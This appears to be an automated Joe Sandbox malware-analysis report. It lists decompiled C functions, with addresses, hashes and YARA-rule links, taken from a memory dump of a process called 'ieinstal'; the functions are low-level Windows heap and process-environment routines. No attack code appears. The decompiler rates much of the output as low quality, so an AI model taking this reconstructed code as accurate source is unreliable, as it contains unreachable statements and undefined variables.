                                                            C-Code - Quality: 43%
                                                            			E1ED28D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x1ed4d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E1EC77D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E1EC9B640(E1EC99AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                            0x1ed28d34
                                                            0x1ed28d43
                                                            0x1ed28d4b
                                                            0x1ed28d4e
                                                            0x1ed28d52
                                                            0x1ed28d5c
                                                            0x1ed28d6e
                                                            0x1ed28d5e
                                                            0x1ed28d67
                                                            0x1ed28d67
                                                            0x1ed28d79
                                                            0x1ed28d7a
                                                            0x1ed28d7c
                                                            0x1ed28d81
                                                            0x1ed28d94

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 43fc2fd6603462ee931b4ae42a53bb8b94843c7cd2b5351592a1c021cc5f65d2
                                                            • Instruction ID: d45a298c10d4cf13930213b81fca2f37c636d52b9402fd014afb3f4b92333310
                                                            • Opcode Fuzzy Hash: 43fc2fd6603462ee931b4ae42a53bb8b94843c7cd2b5351592a1c021cc5f65d2
                                                            • Instruction Fuzzy Hash: 04F09074E04648AFC704DFB8D846AAEB7B4EF14600F5085A9E905AB280EA34E9008754
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED28B58 Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 36%
                                                            			E1ED28B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x1ed4d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E1EC77D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E1EC9B640(E1EC99AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                            0x1ed28b67
                                                            0x1ed28b6f
                                                            0x1ed28b72
                                                            0x1ed28b7d
                                                            0x1ed28b8f
                                                            0x1ed28b7f
                                                            0x1ed28b88
                                                            0x1ed28b88
                                                            0x1ed28b9a
                                                            0x1ed28b9b
                                                            0x1ed28b9d
                                                            0x1ed28ba2
                                                            0x1ed28bb5

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01d513eab53b12be8c5e83938e54c29b75ae105c60a3be7aad6e29734f42fde9
                                                            • Instruction ID: e0bb4316dadc7e1da018846e5de9ae6b9023f4373831eee011bf2ffdef77fa66
                                                            • Opcode Fuzzy Hash: 01d513eab53b12be8c5e83938e54c29b75ae105c60a3be7aad6e29734f42fde9
                                                            • Instruction Fuzzy Hash: DEF082B4A04259ABDB04DBA8D906E6EB3B4EF04704F440569B905DB380EF34E900C798
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC54F2E Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E1EC54F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E1ED288F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E1EC7C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1ec31030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                            0x1ec54f2e
                                                            0x1ec54f34
                                                            0x1ec54f38
                                                            0x1ecb0b85
                                                            0x1ecb0b85
                                                            0x1ecb0b89
                                                            0x1ecb0b9a
                                                            0x1ecb0b9a
                                                            0x1ecb0b9f
                                                            0x00000000
                                                            0x1ecb0b9f
                                                            0x1ecb0b94
                                                            0x1ecb0b98
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb0b98
                                                            0x1ec54f3e
                                                            0x1ec54f48
                                                            0x00000000
                                                            0x1ec54f6e
                                                            0x00000000
                                                            0x1ec54f70

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 66d9c0b8b527c54a6122e740728fe47afd51d33076962c7a8c479c789c2a8a62
                                                            • Instruction ID: e8a5384be0f06098170172b6bc690e4c0d8ead4e11ab68aecd2ba2cfc8de4cf8
                                                            • Opcode Fuzzy Hash: 66d9c0b8b527c54a6122e740728fe47afd51d33076962c7a8c479c789c2a8a62
                                                            • Instruction Fuzzy Hash: 28F0BE37921BC6CFD360C758C9A1F02B7E6BB047B9F414B64D40687A28D724EC80C640
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED28CD6 Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 36%
                                                            			E1ED28CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x1ed4d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E1EC77D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E1EC9B640(E1EC99AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                            0x1ed28ce5
                                                            0x1ed28ced
                                                            0x1ed28cf0
                                                            0x1ed28cfb
                                                            0x1ed28d0d
                                                            0x1ed28cfd
                                                            0x1ed28d06
                                                            0x1ed28d06
                                                            0x1ed28d18
                                                            0x1ed28d19
                                                            0x1ed28d1b
                                                            0x1ed28d20
                                                            0x1ed28d33

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 662ffdd18f807c4131e7516ee651065922690cc49e0df4bdd2d66a04e4546ee0
                                                            • Instruction ID: f87bdce20ddac573dc5e0b4cf5968174dbc25a03f6ab19858252c08b42946704
                                                            • Opcode Fuzzy Hash: 662ffdd18f807c4131e7516ee651065922690cc49e0df4bdd2d66a04e4546ee0
                                                            • Instruction Fuzzy Hash: 4BF0E274A04249AFCB04CBA8D846EAEB7B4EF18300F5006A9F801EB280EE34E900C758
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC7746D Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 88%
                                                            			E1EC7746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E1EC6EB70(__ecx, 0x1ed479a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E1EC995D0();
							L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                            0x1ec7746d
                                                            0x1ec7746d
                                                            0x1ec7746d
                                                            0x1ec77471
                                                            0x1ec77488
                                                            0x1ecbf92d
                                                            0x1ec7748e
                                                            0x1ec77491
                                                            0x1ec77495
                                                            0x1ecbf937
                                                            0x1ecbf93a
                                                            0x1ecbf94e
                                                            0x1ecbf953
                                                            0x1ecbf956
                                                            0x1ecbf956
                                                            0x1ec77495
                                                            0x00000000
                                                            0x1ec77488
                                                            0x1ec77473
                                                            0x1ec77478
                                                            0x1ec7747d
                                                            0x1ec77481
                                                            0x00000000
                                                            0x1ec77481
                                                            0x1ec7747d
                                                            0x1ec7747a
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd453bc16b64505b6b885480aa2b763b31a54b11e3d885ca9995e930459d2837
                                                            • Instruction ID: 84a859c679775f7ba8d04ae9e2127f5c2e951ad956a9810e48f77d26fd638176
                                                            • Opcode Fuzzy Hash: dd453bc16b64505b6b885480aa2b763b31a54b11e3d885ca9995e930459d2837
                                                            • Instruction Fuzzy Hash: 92F08936D141CDABDF01877ACC40B5A7B72AF04256F150755DC50A7264E769D881CFC5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC8A44B Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E1EC8A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1ed47b9c; // 0x0
				_t15 = __ecx;
				_t16 = L1EC74620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E1EC9FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                            0x1ec8a44b
                                                            0x1ec8a453
                                                            0x1ec8a472
                                                            0x1ec8a476
                                                            0x00000000
                                                            0x1ec8a493
                                                            0x1ec8a47a
                                                            0x1ec8a47f
                                                            0x1ec8a486
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bdacb946615e461ee662c71b984e0e2d622a4fc89db1415a9e68f8c773ef3711
                                                            • Instruction ID: ada7a40310335c9db0721a15813b43d19c70307b471055dd19b43218488f4c44
                                                            • Opcode Fuzzy Hash: bdacb946615e461ee662c71b984e0e2d622a4fc89db1415a9e68f8c773ef3711
                                                            • Instruction Fuzzy Hash: A1E092B2A01421ABD2124F19EC00F6A73ADEBE4655F0A5535E904C7224DA28ED12C7E4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC5F358 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 79%
                                                            			E1EC5F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E1EC8F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L1EC74620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                            0x1ec5f35d
                                                            0x1ec5f361
                                                            0x1ec5f367
                                                            0x1ec5f372
                                                            0x1ec5f38c
                                                            0x1ec5f38c
                                                            0x1ec5f394

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                            • Instruction ID: 1dcb216f8bceec6ba175815c1511afd32e719e4d7f950e8033696e52e81db054
                                                            • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                            • Instruction Fuzzy Hash: F1E0D832A4115CFBDB2197D99E05F9ABBBDDF44A61F014255B904D7250DA60DD80C2D0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC6FF60 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E1EC6FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x1ec311a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E1ED288F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E1EC70050(_t14);
				}
			}










                                                            0x1ec6ff66
                                                            0x1ec6ff6b
                                                            0x00000000
                                                            0x1ec6ff8f
                                                            0x00000000
                                                            0x1ec6ff8f

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 49eca848acc04b2b2a766f6d21930f99035b54f2407a3bf3287ba5194e852b13
                                                            • Instruction ID: 283282e8306214fc19f15791a4733803dc44a208b2d4a1432c050abbe1dd1000
                                                            • Opcode Fuzzy Hash: 49eca848acc04b2b2a766f6d21930f99035b54f2407a3bf3287ba5194e852b13
                                                            • Instruction Fuzzy Hash: 7DE0DFB66152C69FD324CF52D8D0F0677EAAB4A721F9A871DF0084B209CB22E8C0C217
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED0D380 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E1ED0D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L1EC5E8B0(__ecx, _a4, 0xfff);
					L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                            0x1ed0d38a
                                                            0x1ed0d39b
                                                            0x1ed0d3b1
                                                            0x00000000
                                                            0x1ed0d3b6
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                            • Instruction ID: f8a8e2d88562b14ec7751a760269d608483f81359f32d4723c30df15bbba9029
                                                            • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                            • Instruction Fuzzy Hash: 08E0C235280288BFDB225E44CC00F69BB1ADF407A1F104532FE085A790CA71EC91DAD4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ECE41E8 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 82%
                                                            			E1ECE41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x1ed308f0);
				_t5 = E1ECAD08C(__ebx, __edi, __esi);
				if( *0x1ed487ec == 0) {
					E1EC6EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x1ed487ec == 0) {
						 *0x1ed487f0 = 0x1ed487ec;
						 *0x1ed487ec = 0x1ed487ec;
						 *0x1ed487e8 = 0x1ed487e4;
						 *0x1ed487e4 = 0x1ed487e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L1ECE4248();
				}
				return E1ECAD0D1(_t5);
			}





                                                            0x1ece41e8
                                                            0x1ece41ea
                                                            0x1ece41ef
                                                            0x1ece41fb
                                                            0x1ece4206
                                                            0x1ece420b
                                                            0x1ece4216
                                                            0x1ece421d
                                                            0x1ece4222
                                                            0x1ece422c
                                                            0x1ece4231
                                                            0x1ece4231
                                                            0x1ece4236
                                                            0x1ece423d
                                                            0x1ece423d
                                                            0x1ece4247

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 09da1298d6acd8e5f5ac62975ba2ed8e9e959ab0f8c94b8445ad833aa36cadb5
                                                            • Instruction ID: 6482fd4b1effe552231bef1aef8f82c83dd671bbafb3733824c351a0f32c3d0b
                                                            • Opcode Fuzzy Hash: 09da1298d6acd8e5f5ac62975ba2ed8e9e959ab0f8c94b8445ad833aa36cadb5
                                                            • Instruction Fuzzy Hash: 82F01C7D860791CFC750DF65C967728BAA4FBA4392F504616E15087E88DB345A86CF01
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC8A185 Relevance: .0, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E1EC8A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x1ed467e4 >= 0xa) {
					if(_t5 < 0x1ed46800 || _t5 >= 0x1ed46900) {
						return L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E1EC70010(0x1ed467e0, _t5);
				}
			}





                                                            0x1ec8a190
                                                            0x1ec8a1a6
                                                            0x1ec8a1c2
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec8a192
                                                            0x1ec8a192
                                                            0x1ec8a19f
                                                            0x1ec8a19f

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b2c2bdb2595f67ae1ea9488db133af82327f6bd0eb8cf9cbfc7d7a922ff3f686
                                                            • Instruction ID: 6e1b5d05376fcbb439794ba381050a9a8df0baa6e90c3624eb475f2fb8bc6587
                                                            • Opcode Fuzzy Hash: b2c2bdb2595f67ae1ea9488db133af82327f6bd0eb8cf9cbfc7d7a922ff3f686
                                                            • Instruction Fuzzy Hash: 67D02E32960180EAE72D0709CE50F292212AB90F18F700F0CF0234AEA0DEB4A8D2C304
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC816E0 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E1EC816E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E1EC81710(0x1ed467e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L1EC74620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                            0x1ec816e8
                                                            0x1ec816ef
                                                            0x1ec816f3
                                                            0x1ec816fe
                                                            0x00000000
                                                            0x1ec81700
                                                            0x1ec8170d
                                                            0x1ec8170d
                                                            0x1ec816f2
                                                            0x1ec816f2
                                                            0x1ec816f2
                                                            0x1ec816f2

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fb6864d7370ef6dd0f90208485ef7c744eb8c04a0c383b730e80b6f1821b689b
                                                            • Instruction ID: 3d81d86be716c39e4c01b494f130d708f3bfa057195e1882fecbd60931e6f93b
                                                            • Opcode Fuzzy Hash: fb6864d7370ef6dd0f90208485ef7c744eb8c04a0c383b730e80b6f1821b689b
                                                            • Instruction Fuzzy Hash: 13D0A932210280A2DA1D4B119E20F1C23E2EBC0B99F34066CF10B49CC2CFB0EDA2E048
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ECD53CA Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E1ECD53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E1EC6EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                            0x1ecd53ca
                                                            0x1ecd53ce
                                                            0x1ecd53d9
                                                            0x1ecd53de
                                                            0x1ecd53e1
                                                            0x1ecd53e1
                                                            0x1ecd53e6
                                                            0x1ecd53f3
                                                            0x00000000
                                                            0x1ecd53f8
                                                            0x1ecd53fb

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                            • Instruction ID: 2d155a1a93eb6a17bf5f2ddbaa2de5fc17a25cbc30ae030ea2f99e4f3d614186
                                                            • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                            • Instruction Fuzzy Hash: 2CE04636A007849BCF02CB49CAA0F4AB7F6FB84B00F100504A1085B720CA26A900CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC6AAB0 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E1EC6AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                            0x1ec6aab6
                                                            0x1ec6aabb
                                                            0x1ecba442
                                                            0x00000000
                                                            0x1ecba448
                                                            0x1ecba454
                                                            0x1ecba454
                                                            0x1ec6aac1
                                                            0x1ec6aac1
                                                            0x1ec6aac6
                                                            0x1ec6aac6

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
